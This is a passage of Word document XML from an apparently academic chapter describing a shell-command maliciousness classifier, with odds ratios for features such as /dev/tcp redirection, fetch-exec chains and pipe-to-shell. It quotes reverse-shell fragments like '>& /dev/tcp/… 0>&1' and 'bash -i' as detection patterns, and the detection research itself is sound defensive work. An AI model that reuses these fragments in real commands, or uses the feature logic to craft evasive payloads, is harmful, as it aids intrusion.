        <w:t>n_quotes</w:t>
      </w:r>
      <w:r>
        <w:t>.** These encode how a command wires processes and file descriptors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>together. The security reasoning is that composition depth tracks payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>complexity: a reverse shell stacks redirections (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&amp; /dev/tcp/… 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t>) at a level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ordinary commands rarely reach, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stream-merging is characteristic of a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shell being attached to a socket rather than a terminal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_stderr_merge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bears</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">this out on Dataset 1 (OR 28.7) and is the reason </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alone is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">insufficient — the extractor strips </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forms before counting, so the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>two features are complementary rather than redundant. The instructive failure is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which leans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>benign on both corpora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (d −0.17 / −0.11): piping is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>core idiom of Unix administration, and attackers use it less than administrators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>do. The intuition that "piping looks suspicious" is simply wrong, and the feature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is kept because being reliably wrong in a known direction is useful to a model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Network and delivery (4) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_private_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_tcp</w:t>
      </w:r>
      <w:r>
        <w:t>.** A LotL attack must eventually name somewhere to fetch from or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>call back to, and that endpoint has to appear literally in the command string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the purest signal in the entire feature set — a bash-only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>redirect with essentially no legitimate interactive use, at OR 559 on Dataset 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The others are progressively more dual-use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (OR 2.70 / 6.50) is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>genuinely ambiguous because documentation corpora are full of URLs, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the project's designated shortcut hazard, firing on 100% of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows in Dataset 1. It was kept deliberately rather than removed: its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dataset 2 odds ratio of 5.00 is earned on a corpus containing no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>all, so the signal is real even though the Dataset 1 measurement is contaminated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Hiding the feature would have hidden the problem; it is instead surfaced as a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 4 source-ablation exhibit. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_private_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> separates lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(RFC1918 targets) from external C2, and is near-inert on Dataset 1 by design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Binary families (6) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_interp_bin</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_enum_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_evasion_tok</w:t>
      </w:r>
      <w:r>
        <w:t>.** These are fixed,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>threat-mapped lists — chosen from the threat model before seeing data, so they</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cannot memorise corpus vocabulary the way a learned bag-of-words does. Each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">answers "which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of program is involved": something that downloads,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>something that is a shell, something that interprets code, something catalogued</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">by GTFOBins, something that enumerates, something that evades. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the family's strongest and most transferable member (OR 5.56 / 7.96). The family</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">also contains the project's central negative result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>benign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicator on both corpora (OR 0.62 / 0.50), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_enum_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inverts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>outright (2.50 / 0.67). Naming a program turns out to be weak evidence about</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>intent, which is precisely the finding that justifies the next two families.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Head and arguments (6) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_interp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_lotl</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_privesc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_flags</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_long_flag</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t>position*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>should be stronger: a command whose first token is a shell is being invoked as a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shell, whereas one that merely mentions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> may be documentation. The head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>tokens are extracted after stripping variable-assignment prefixes, so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FOO=1 bash -i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is read correctly. The gain is real — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reaches OR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">47.9 / 13.6, far above </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t>'s 32.8 / 5.99 on the same corpora — and it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is what rescued the sudo row in Section 1.2 after the presence-based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_privesc_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was killed as class-neutral (OR 0.99 / 1.01). The flag features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">capture invocation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>: administrators use readable long options (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--verbose</w:t>
      </w:r>
      <w:r>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">scripted payloads use terse ones, which is why </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_long_flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> drops to OR 0.08 on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the honeypot corpus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Execution micro-structure (8) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pipe_to_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_exec_chain</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_decode_exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ifs_expansion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_heredoc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_flag_i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_exec_flag</w:t>
      </w:r>
      <w:r>
        <w:t>.** This is the family that most directly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>encodes the conjunction argument. Rather than leaving the model to discover that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>fetch tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ∧ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ∧ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>interpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the download-cradle signature, the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">extractor computes that conjunction explicitly as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_exec_chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (OR 45.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/ 9.03), and likewise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pipe_to_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for any pipe terminating in an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>interpreter. These are deliberately rare — most fire on well under 1% of rows and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contribute nothing to aggregate accuracy — and they are kept for exactly that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reason: they are near-conclusive when they do fire. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pipe_to_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>single most transferable feature in the project (OR 8.65 on Dataset 1, 8.68 on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2), which is strong evidence that the underlying behaviour, not a corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">artefact, is being measured. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_flag_i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_exec_flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capture the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>interactive and inline-command invocations characteristic of reverse shells;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
